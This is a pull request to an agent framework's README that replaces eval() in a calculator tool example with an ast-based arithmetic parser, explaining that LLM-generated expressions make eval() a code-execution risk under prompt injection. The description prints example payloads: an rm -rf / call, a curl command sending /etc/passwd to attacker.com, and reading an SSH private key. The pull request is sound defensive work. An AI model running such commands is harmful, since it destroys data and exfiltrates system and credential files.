### PR TITLE
fix: replace eval() in README examples with safe ast-based arithmetic parser

### DIFF
--- a/README.md
+++ b/README.md
@@ -158,9 +158,27 @@ def search(query: str) -> str:
     """Search for information."""
     return f"Found information about {query}"
 
+import ast
+import operator as op
+
 def calculate(expression: str) -> float:
-    """Perform mathematical calculations."""
-    return eval(expression)  # Use safely in production
+    """Perform mathematical calculations safely.
+
+    Never use eval() here — the LLM generates the expression string, so
+    eval() would let it execute arbitrary Python (e.g. os.system('rm -rf /')).
+    ast.parse restricts evaluation to safe arithmetic only.
+    """
+    ops = {
+        ast.Add: op.add, ast.Sub: op.sub,
+        ast.Mult: op.mul, ast.Div: op.truediv,
+    }
+    def _eval(node):
+        if isinstance(node, ast.Constant):
+            return float(node.value)
+        if isinstance(node, ast.BinOp) and type(node.op) in ops:
+            return ops[type(node.op)](_eval(node.left), _eval(node.right))
+        raise ValueError(f"Expression not allowed: {expression}")
+    return _eval(ast.parse(expression, mode="eval").body)
 
 # 2. Create an agent with tools and personality
 agent = Agent(
@@ -382,9 +400,22 @@ agent = Agent("assistant", tools=[Calculator(), CurrentTime(), ReadFile()])
 
 ### New Function-Based Approach (Recommended)
 ```python
+import ast
+import operator as op
+
 def calculate(expression: str) -> float:
-    """Perform mathematical calculations."""
-    return eval(expression)  # Use safely in production
+    """Perform mathematical calculations safely.
+
+    Using ast.parse instead of eval() — the LLM controls the expression
+    string, so eval() is a remote code execution risk.
+    """
+    ops = {ast.Add: op.add, ast.Sub: op.sub, ast.Mult: op.mul, ast.Div: op.truediv}
+    def _eval(n):
+        if isinstance(n, ast.Constant): return float(n.value)
+        if isinstance(n, ast.BinOp) and type(n.op) in ops:
+            return ops[type(n.op)](_eval(n.left), _eval(n.right))
+        raise ValueError(f"Expression not allowed: {n}")
+    return _eval(ast.parse(expression, mode="eval").body)
 
 def get_time(format: str = "%Y-%m-%d %H:%M:%S") -> str:
     """Get current date and time."""


### PR DESCRIPTION
## Problem

The `calculate` tool example in the README uses Python's built-in `eval()`:

```python
def calculate(expression: str) -> float:
    """Perform mathematical calculations."""
    return eval(expression)  # Use safely in production
```

The comment `# Use safely in production` makes this worse, not better — it implies this pattern is acceptable in production.

**In an agent context, `eval()` is a remote code execution (RCE) risk.**

The expression string is generated by the LLM, not by a trusted user. An attacker who can influence the LLM's output (prompt injection, malicious tool results, etc.) can execute arbitrary Python:

```python
# All of these would execute silently with the current example:
__import__('os').system('rm -rf /')
__import__('subprocess').run(['curl', 'attacker.com', '-d', open('/etc/passwd').read()])
open('/home/user/.ssh/id_rsa').read()
```

This isn't theoretical. Prompt injection against agent tool inputs is an active attack surface.

## Fix

Replace `eval()` with a safe `ast.parse`-based evaluator that restricts execution to basic arithmetic (`+`, `-`, `*`, `/`) only. No imports, no attribute access, no function calls.

```python
import ast
import operator as op

def calculate(expression: str) -> float:
    """Perform mathematical calculations safely.

    Never use eval() here — the LLM generates the expression string, so
    eval() would let it execute arbitrary Python (e.g. os.system('rm -rf /')).
    ast.parse restricts evaluation to safe arithmetic only.
    """
    ops = {
        ast.Add: op.add, ast.Sub: op.sub,
        ast.Mult: op.mul, ast.Div: op.truediv,
    }
    def _eval(node):
        if isinstance(node, ast.Constant):
            return float(node.value)
        if isinstance(node, ast.BinOp) and type(node.op) in ops:
            return ops[type(node.op)](_eval(node.left), _eval(node.right))
        raise ValueError(f"Expression not allowed: {expression}")
    return _eval(ast.parse(expression, mode="eval").body)
```

## Changes

- Fixed `Manual Usage` code example (first occurrence)
- Fixed `Example Tools — New Function-Based Approach` code example (second occurrence)
- Added inline comments in both examples explaining *why* `eval()` is unsafe in agent contexts — this makes the fix educational, not just silent

## Why This Matters for ConnectOnion Specifically

ConnectOnion's whole value proposition is making agent tools easy and production-safe. The README is the first thing new developers see. Showing `eval()` with the comment "Use safely in production" teaches the wrong lesson at exactly the wrong moment — when someone is learning how to build their first tool.

The `ast`-based replacement is still readable, stdlib-only (no new dependency), and works correctly for the `25 * 4` example in the README.